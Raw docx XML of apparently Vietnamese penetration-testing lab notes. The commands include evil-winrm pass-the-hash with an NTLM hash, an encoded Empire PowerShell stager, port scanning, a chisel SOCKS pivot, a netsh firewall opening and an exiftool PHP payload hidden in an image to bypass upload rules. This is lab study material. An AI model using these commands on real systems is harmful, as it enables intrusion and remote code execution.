        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F00FF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00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.200.84.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DAB188" w14:textId="39251C32" w:rsidR="00F00FFB" w:rsidRDefault="00F00FFB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0FFB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F00FFB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F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>noP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00FFB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F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w 1 -enc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00FFB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payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00F00FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00F16E2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5E3998" w14:textId="45D469FD" w:rsidR="001657FC" w:rsidRDefault="001657FC" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB56975" w14:textId="29508EE1" w:rsidR="00D34DA3" w:rsidRDefault="001657FC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34DA3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use module</w:t>
      </w:r>
      <w:r w:rsidR="00D34DA3" w:rsidRPr="00D34D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C011B" wp14:editId="46923E76">
            <wp:extent cx="5943600" cy="415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15DB" w14:textId="77777777" w:rsidR="0063193A" w:rsidRDefault="006319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862495" w14:textId="6797222D" w:rsidR="0063193A" w:rsidRDefault="0063193A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thang</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C0647E" w14:textId="5ADBE09B" w:rsidR="00930602" w:rsidRDefault="0063193A" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006319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D4542" wp14:editId="702DD4FB">
            <wp:extent cx="5943600" cy="4999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89BA" w14:textId="56921972" w:rsidR="00EA5046" w:rsidRDefault="00EA5046" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE71EB4" w14:textId="7D1989C6" w:rsidR="00EA5046" w:rsidRDefault="00EA5046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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>giai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cuối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C75C27" w14:textId="42392638" w:rsidR="007721FB" w:rsidRDefault="007721FB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21FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007721FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winrm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tới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empire.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EB1C80" w14:textId="5902B1EE" w:rsidR="007721FB" w:rsidRDefault="007721FB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721FB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7721FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007721FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007721FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u Administrator -H 37db630168e5f82aafa8461e05c6bbd1 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007721F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721FB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.200.84.150 -s   /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770CF80" w14:textId="5F53F64B" w:rsidR="00176FC7" w:rsidRDefault="00176FC7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scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C8040" w14:textId="05C1633F" w:rsidR="00176FC7" w:rsidRDefault="00176FC7" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00176FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00176FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Hosts 10.200.84.100 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00176FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TopPorts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00176FC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4ED38" w14:textId="29138E82" w:rsidR="00EA5046" w:rsidRDefault="00D637A1" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63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22C1E3" wp14:editId="0552CA6A">
            <wp:extent cx="5943600" cy="2511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212E" w14:textId="77777777" w:rsidR="00371CA4" w:rsidRDefault="00371CA4" w:rsidP="00B2650F">
      <w:pPr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</w:pPr>
    </w:p>
    <w:p w14:paraId="6E4ED628" w14:textId="1C38FBEE" w:rsidR="008417D3" w:rsidRDefault="00371CA4" w:rsidP="00B2650F">
      <w:pPr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</w:pPr>
      <w:proofErr w:type="spellStart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netsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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advfirewall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> firewall add rule name="Chisel-</w:t>
      </w:r>
      <w:r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dai</w:t>
      </w:r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 xml:space="preserve">" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=in action=allow protocol=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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localport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00371CA4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=47000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305323F0" w14:textId="0341CED5" w:rsidR="00095AC5" w:rsidRPr="00095AC5" w:rsidRDefault="00095AC5" w:rsidP="00095AC5">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00095AC5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.\chisel.exe server -p 47210 --socks5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512591CE" w14:textId="00968C3A" w:rsidR="00B73680" w:rsidRDefault="00095AC5" w:rsidP="00095AC5">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="00095AC5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 xml:space="preserve"> chisel client 10.200.84.150:47210 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00095AC5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="C41414"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EAEAED"/>
        </w:rPr>
        <w:t>2080:socks</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E66FFCF" w14:textId="4C87672F" w:rsidR="000A2500" w:rsidRDefault="000A2500" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A25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4A6C53" wp14:editId="61992E05">
            <wp:extent cx="5943600" cy="4267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35E1" w14:textId="28A40D5A" w:rsidR="00030AF3" w:rsidRDefault="005E567B" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E567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0FB32C" wp14:editId="04F362AD">
            <wp:extent cx="5943600" cy="10407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FFAF" w14:textId="199A2ACB" w:rsidR="00387406" w:rsidRDefault="00387406" w:rsidP="00B26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sockproxy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>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>poxyproxy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AB8AB3F" w14:textId="527ED617" w:rsidR="00387406" w:rsidRDefault="00387406" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003874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81462" wp14:editId="14940993">
            <wp:extent cx="5943600" cy="2978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E51A" w14:textId="77777777" w:rsidR="001241B5" w:rsidRDefault="001241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A105E1" w14:textId="796B66C5" w:rsidR="003B25F5" w:rsidRDefault="003B25F5" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28529232" w14:textId="41E545F9" w:rsidR="003B25F5" w:rsidRDefault="003B25F5" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B25F5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>download C:\GitStack\repositories\Website.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DBDE88" w14:textId="2C57C233" w:rsidR="001241B5" w:rsidRDefault="00F15951" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F159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667DE" wp14:editId="0FF186E6">
            <wp:extent cx="5943600" cy="8312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DBBF" w14:textId="02EDF196" w:rsidR="00534469" w:rsidRDefault="00534469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tools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extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D59A7A2" w14:textId="2408ADDD" w:rsidR="00534469" w:rsidRDefault="00534469" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005344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69996" wp14:editId="573EECA1">
            <wp:extent cx="5820587" cy="166710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B4CC" w14:textId="4E66C4B8" w:rsidR="00534469" w:rsidRDefault="00534469" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5795B67C" w14:textId="5275D75F" w:rsidR="00012DD7" w:rsidRDefault="00012DD7" w:rsidP="00B26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commit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736AAD2A" w14:textId="17CD9BEF" w:rsidR="00012DD7" w:rsidRDefault="00012DD7" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">separator="======================================="; for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD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2DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in $(ls); do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD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012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n$separator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\n\033[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4;1m$i\033[0m\n$(cat $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD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2DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/commit-meta.txt)\n"; done; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD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012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "\n\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n$separator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00012DD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\n\n\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3DE8A" w14:textId="55182DE2" w:rsidR="00012DD7" w:rsidRDefault="00012DD7" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012D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C1838B" wp14:editId="191B7BBD">
            <wp:extent cx="5943600" cy="30206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02D6" w14:textId="1F4D8F1B" w:rsidR="00BD1CE7" w:rsidRDefault="00C26325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review code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA51C7B" w14:textId="689967D3" w:rsidR="00C26325" w:rsidRDefault="00C26325" w:rsidP="00B2650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26325">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C26325">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -name "*.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6031097A" w14:textId="365C2020" w:rsidR="0001297D" w:rsidRDefault="0001297D" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012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35101" wp14:editId="2002CC0D">
            <wp:extent cx="5943600" cy="17856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C396" w14:textId="77777777" w:rsidR="00661EF2" w:rsidRDefault="00661EF2" w:rsidP="00661E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Scan directory qua proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC3F56" w14:textId="77777777" w:rsidR="00661EF2" w:rsidRDefault="00661EF2" w:rsidP="00661E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E5F3A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE5F3A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://10.200.84.100/ -p socks5://127.0.0.1:2080      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5FE083" w14:textId="77777777" w:rsidR="00DC091F" w:rsidRDefault="00661EF2" w:rsidP="00661EF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0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046B8" wp14:editId="1DA38201">
            <wp:extent cx="4630156" cy="544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2129" cy="545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7988" w14:textId="7DA33E2E" w:rsidR="00DC091F" w:rsidRDefault="00661EF2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Thomas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crack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resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C175CB" w14:textId="2E4944C8" w:rsidR="00661EF2" w:rsidRDefault="00661EF2" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD5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8850D8" wp14:editId="677929E6">
            <wp:extent cx="5943600" cy="1964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435"/>
                    <a:stretch/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C7CE9" w14:textId="77777777" w:rsidR="00D96606" w:rsidRDefault="00D96606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image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bất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them </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>đuổi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1B2E2348" w14:textId="76789BAC" w:rsidR="007F5D1D" w:rsidRDefault="007F5D1D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exiftool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payload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rule upload file</w:t>
      </w:r>
      <w:r w:rsidR="00D96606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC8A9EF" w14:textId="7E0C8E82" w:rsidR="00D96606" w:rsidRDefault="00D96606" w:rsidP="00B2650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6606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D96606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Comment="&lt;?php echo \"&lt;pre&gt;Test Payload&lt;/pre&gt;\"; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D96606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>die(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D96606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">); ?&gt;"  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D96606">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>background.jpg.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9660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5F25E00" w14:textId="2BD412F7" w:rsidR="007F5D1D" w:rsidRDefault="007F5D1D" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5D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538CF" wp14:editId="465D545D">
            <wp:extent cx="5943600" cy="3283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BBD5" w14:textId="7A955A80" w:rsidR="00DC091F" w:rsidRDefault="00C710A5" w:rsidP="00B26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thử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658BC8" w14:textId="052D7D5A" w:rsidR="00365742" w:rsidRDefault="007F5D1D" w:rsidP="00B2650F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5D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C4F40" wp14:editId="3E72D2E8">
            <wp:extent cx="5943600" cy="1047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858" b="9930"/>
                    <a:stretch/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B0EA4" w14:textId="62D754BA" w:rsidR="007F5D1D" w:rsidRDefault="00365742" w:rsidP="00B26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BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Code php </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD1CE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BD1C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1CE7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BD1CE7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
